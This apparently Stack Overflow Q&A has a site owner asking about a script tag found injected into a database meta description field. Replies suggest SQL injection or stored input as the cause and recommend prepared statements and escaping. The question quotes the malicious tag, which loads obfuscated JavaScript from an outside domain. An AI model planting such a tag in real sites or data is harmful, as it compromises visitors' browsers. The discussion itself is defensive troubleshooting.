An external script has been injected to my database

Question

Im retrieving meta description from my database, to my suprise, the data that has been returned with an appended script code.

Heres the code that happened to be added to my database entry

<script id="alp1398" type="text/javascript" src="http://earcuff.nl/js/jqueryinit.js"></script>

Any idea, how could this happen, or what does this script do?

If you have a form that a user can type unvalidated text into and that text is subsequently inserted into your database then the user could type _anything_ and it would be saved. This isn't actually a problem as long as you use parameterised SQL queries to avoid SQL injection attacks, and as long as you adequately escape the text if and when you display it on any webpages (just as StackOverflow has done with the text of your question). As for what that specific script would do if you actually included it on a webpage, I don't know, and I'm not going to load it up to find out... — nnnnnn, Aug 11 '14 at 02:16
The file looks vaguely virus like, with a bunch of obfuscation going on. [Copy of script](http://pastie.org/9460956) — Mike Christensen, Aug 11 '14 at 02:22
@MikeChristensen Unpacked version: http://pastie.org/9460962 — cbr, Aug 11 '14 at 02:24
I cant disclose anymore info regarding this, but given your thoughts, i think i know what to do to prevent this. Thanks — user3909562, Aug 11 '14 at 02:44

score 2 · Answer 1 · answered Aug 11 '14 at 02:20

Most usual vector of attack - parameters you use to populate your database. Check that you always use prepared statements (i.e. SQL with ? in place of the parameters) and if you cannot (e.g. in ORDER BY clause) you have to sanitize the input.

Other vectors include hacking your account itself to be able to execute SQL statements.

It is hard to tell what exactly happened with so little data you provided in the question. Please, state what middle tier you are using etc.

An external script has been injected to my database

1 Answers1